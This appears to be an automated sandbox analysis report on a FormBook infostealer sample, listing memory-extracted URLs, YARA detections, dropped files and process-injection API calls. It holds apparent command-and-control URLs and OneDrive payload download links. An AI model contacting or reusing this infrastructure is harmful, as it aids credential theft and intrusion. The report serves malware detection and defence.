    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.bolbjergs.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.ciscoaslabs.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.ciscoaslabs.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.ciscoaslabs.com/la8/www.shxzauto.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.ciscoaslabs.comReferer:
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.fekrforoush.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.fekrforoush.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.fekrforoush.com/la8/www.lowbrowpizzaandbeer.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.fekrforoush.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.funuldigital.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.funuldigital.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.funuldigital.com/la8/www.3-333i000000x01-virus.net
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.funuldigital.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.hot-items-on-the-web.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.hot-items-on-the-web.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.hot-items-on-the-web.com/la8/www.talleralbamotors.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.hot-items-on-the-web.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.hothotshortie.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.hothotshortie.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.hothotshortie.com/la8/www.fekrforoush.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.hothotshortie.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp, mstsc.exe, 0000000B.00000002.2469457226.01BA9000.00000004.00000001.sdmpString found in binary or memory: http://www.lowbrowpizzaandbeer.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp, mstsc.exe, 0000000B.00000002.2469457226.01BA9000.00000004.00000001.sdmpString found in binary or memory: http://www.lowbrowpizzaandbeer.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.lowbrowpizzaandbeer.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.mansiobok3.info
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.mansiobok3.info/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.mansiobok3.info/la8/www.weifangruanjiankaifa.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.mansiobok3.infoReferer:
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://www.mozilla.com0
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.myaccesscomm.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.myaccesscomm.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.myaccesscomm.com/la8/www.pg-farm.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.myaccesscomm.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.onenationrescue.info
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.onenationrescue.info/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.onenationrescue.info/la8/www.bolbjergs.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.onenationrescue.infoReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.pg-farm.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.pg-farm.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.pg-farm.com/la8/www.wangrunjs.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.pg-farm.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.shxzauto.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.shxzauto.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.shxzauto.com/la8/www.mansiobok3.info
    Source: firefox.exe, 00000010.00000002.1594158119.008AF000.00000004.00000001.sdmpString found in binary or memory: http://www.shxzauto.com/statics/busy.html
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.shxzauto.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.talleralbamotors.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.talleralbamotors.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.talleralbamotors.com/la8/www.hothotshortie.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.talleralbamotors.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.wangrunjs.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.wangrunjs.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.wangrunjs.com/la8/www.ciscoaslabs.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.wangrunjs.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.weifangruanjiankaifa.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.weifangruanjiankaifa.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.weifangruanjiankaifa.com/la8/www.hot-items-on-the-web.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.weifangruanjiankaifa.comReferer:
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/Aj
    Source: Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/n
    Source: Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/t
    Source: Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737317069.00319000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/y4mPTQhil0be4D-3ONzJ5ItuDGkvQHeM9XjnTIeZQgPsrIrD1WuxieuSeUoUkeeqzAP
    Source: Dynamitbom9.exe, 00000004.00000002.814167671.00759000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/y4mWVMDxpWPQN7h2ntO62rmsxjBnMlUqJENO4jLBrAJqBNPJoM-eMXjoiXUXeL1Eia6
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/y4mgfnu1PJWJr064ZL9YlIV3jl40tm0q28BBvNE2xZCPCi78baeQwIGk3HYt-PyWvAL
    Source: Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/y4mwehRl38LwSse3IDMRjmotpTH5T3c42gDrwt-LN9unXWz0E3C09_0dxoZFaiJ7gTJ
    Source: mstsc.exe, 0000000B.00000003.1592164253.02680000.00000004.00000001.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
    Source: Dynamitbom9.exe, 00000004.00000002.814167671.00759000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.839971435.00293000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
    Source: Dynamitbom9.exe, 00000016.00000003.1688486304.0033C000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=B3B98222C3EF96E0&resid=B3B98222C3EF96E0%21184&authkey=AHHJ6Y6
    Source: Dynamitbom9.exe, 00000016.00000002.1737317069.00319000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/l
    Source: Dynamitbom9.exe, 00000009.00000002.839971435.00293000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/lT
    Source: Dynamitbom9.exe, 00000016.00000002.1737317069.00319000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/t
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: Dynamitbom9.exe, 00000004.00000002.814167671.00759000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp, Dynamitbom9.exe, 00000016.00000002.1740725585.1DAD0000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0

    E-Banking Fraud:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000018.00000002.1740071374.00060000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2473272217.030F0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.812505176.00030000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.839828819.00030000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000016.00000002.1736537733.00030000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000C.00000002.843123358.00180000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.813297733.006F0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.2467957823.01300000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000016.00000002.1740999047.1E280000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2473955848.03C20000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000010.00000002.1593989873.00060000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.843680618.1DA20000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.2468014555.01330000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.2467062900.00180000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000000.763632814.0A000000.00000040.00000001.sdmp, type: MEMORY

    System Summary:

    barindex
    Detected FormBook malwareShow sources
    Source: C:\Windows\System32\mstsc.exeDropped file: C:\Users\user\AppData\Roaming\K56R799Q\K56logri.iniJump to dropped file
    Source: C:\Windows\System32\mstsc.exeDropped file: C:\Users\user\AppData\Roaming\K56R799Q\K56logrv.iniJump to dropped file
    Source: C:\Program Files\Mozilla Firefox\firefox.exeDropped file: C:\Users\user\AppData\Roaming\K56R799Q\K56logrf.iniJump to dropped file
    Malicious sample detected (through community Yara rule)Show sources
    Source: 0000000B.00000002.2469359795.01A3D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000003.00000000.681534832.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000018.00000002.1740071374.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000018.00000002.1740071374.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000012.00000000.1625183151.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000002.00000000.672400170.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000002.00000002.690888732.0135D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000014.00000000.1664799274.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000B.00000002.2467493164.002FA000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000006.00000002.2473272217.030F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000002.2473272217.030F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000004.00000002.812505176.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000004.00000002.812505176.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000009.00000002.839828819.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000009.00000002.839828819.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000015.00000002.1700409548.0153D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000016.00000002.1736537733.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000016.00000002.1736537733.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000011.00000002.1664860963.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000008.00000002.745327860.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000C.00000002.843123358.00180000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000C.00000002.843123358.00180000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000003.00000002.700791298.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000000.00000000.662300531.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000004.00000002.813297733.006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000004.00000002.813297733.006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000B.00000002.2467957823.01300000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.2467957823.01300000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000004.00000000.691985652.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000016.00000000.1680944385.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000000.00000002.681164345.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000016.00000002.1740999047.1E280000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000016.00000002.1740999047.1E280000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000014.00000002.1704055361.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000009.00000000.730256748.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000006.00000002.2473955848.03C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000002.2473955848.03C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000010.00000002.1593989873.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000010.00000002.1593989873.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000013.00000000.1656172246.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000009.00000002.843680618.1DA20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000009.00000002.843680618.1DA20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000B.00000002.2468014555.01330000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.2468014555.01330000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000B.00000002.2467062900.00180000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.2467062900.00180000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000012.00000002.1715495422.015CD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000008.00000000.722509027.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000013.00000002.1701159325.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000015.00000000.1671516866.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000010.00000002.1594135211.0044D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000011.00000000.1616534141.0040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000006.00000000.763632814.0A000000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000000.763632814.0A000000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F7C0A NtResumeThread,0_2_001F7C0A
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F7829 NtProtectVirtualMemory,0_2_001F7829
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F44D9 NtAllocateVirtualMemory,0_2_001F44D9
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F0722 EnumWindows,NtSetInformationThread,TerminateProcess,NtAllocateVirtualMemory,0_2_001F0722
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F29F9 NtWriteVirtualMemory,0_2_001F29F9
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F7C17 NtResumeThread,0_2_001F7C17
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F2A09 NtWriteVirtualMemory,0_2_001F2A09
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F083D NtSetInformationThread,TerminateProcess,0_2_001F083D
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F2E9E NtWriteVirtualMemory,0_2_001F2E9E
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F7E9B NtResumeThread,0_2_001F7E9B
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F2CBD NtWriteVirtualMemory,0_2_001F2CBD
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F80A5 NtResumeThread,0_2_001F80A5
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F2AD9 NtWriteVirtualMemory,0_2_001F2AD9
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F82D5 NtResumeThread,0_2_001F82D5
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F7CC3 NtResumeThread,0_2_001F7CC3
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F3AE2 NtAllocateVirtualMemory,0_2_001F3AE2
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F7F37 NtResumeThread,0_2_001F7F37
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F076D NtSetInformationThread,TerminateProcess,0_2_001F076D
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F2D9E NtWriteVirtualMemory,0_2_001F2D9E
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F2FD1 NtWriteVirtualMemory,0_2_001F2FD1
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F2BC5 NtWriteVirtualMemory,0_2_001F2BC5
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F7DFF NtResumeThread,0_2_001F7DFF
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F81E5 NtResumeThread,0_2_001F81E5
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_001F7FE1 NtResumeThread,0_2_001F7FE1
    Source: C:\Users\user\Desktop\sample.exeCode function: 2_2_00157829 NtProtectVirtualMemory,2_2_00157829
    Source: C:\Users\user\Desktop\sample.exeCode function: 2_2_001544D9 NtAllocateVirtualMemory,2_2_001544D9
    Source: C:\Users\user\Desktop\sample.exeCode function: 2_2_00150722 EnumWindows,NtSetInformationThread,NtProtectVirtualMemory,TerminateProcess,NtAllocateVirtualMemory,2_2_00150722
    Source: C:\Users\user\Desktop\sample.exeCode function: 2_2_0015083D NtSetInformationThread,TerminateProcess,2_2_0015083D
    Source: C:\Users\user\Desktop\sample.exeCode function: 2_2_00150ADD NtProtectVirtualMemory,2_2_00150ADD
    Source: C:\Users\user\Desktop\sample.exeCode function: 2_2_00153AE2 NtAllocateVirtualMemory,2_2_00153AE2
    Source: C:\Users\user\Desktop\sample.exeCode function: 2_2_0015076D NtSetInformationThread,TerminateProcess,2_2_0015076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F7C0A NtResumeThread,3_2_001F7C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F7829 NtProtectVirtualMemory,3_2_001F7829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F44D9 NtAllocateVirtualMemory,3_2_001F44D9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F0722 EnumWindows,NtSetInformationThread,TerminateProcess,NtAllocateVirtualMemory,3_2_001F0722
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F29F9 NtWriteVirtualMemory,3_2_001F29F9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F7C17 NtResumeThread,3_2_001F7C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F2A09 NtWriteVirtualMemory,3_2_001F2A09
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F083D NtSetInformationThread,TerminateProcess,3_2_001F083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F2E9E NtWriteVirtualMemory,3_2_001F2E9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F7E9B NtResumeThread,3_2_001F7E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F2CBD NtWriteVirtualMemory,3_2_001F2CBD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F80A5 NtResumeThread,3_2_001F80A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F2AD9 NtWriteVirtualMemory,3_2_001F2AD9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F82D5 NtResumeThread,3_2_001F82D5
